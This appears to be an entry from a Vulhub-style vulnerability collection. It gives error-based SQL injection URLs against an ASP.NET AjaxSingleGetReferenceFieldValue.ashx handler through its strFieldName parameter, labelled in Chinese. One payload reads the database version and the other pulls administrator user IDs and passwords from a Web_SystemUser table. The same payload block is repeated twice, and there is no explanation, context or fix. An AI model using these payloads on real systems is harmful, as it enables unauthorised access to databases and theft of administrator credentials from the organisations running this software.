VULHUB ™

``` 注入链接：/Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx 注入参数：strFieldName 【获取数据库版本】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convert(int,@@version) 【管理员账号密码】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convert(int,(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser)) ```  

``` 注入链接：/Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx 注入参数：strFieldName 【获取数据库版本】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convert(int,@@version) 【管理员账号密码】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convert(int,(select+top+1+UserID%2b'|'%2bUserPwd+from+strongmain.dbo.Web_SystemUser)) ```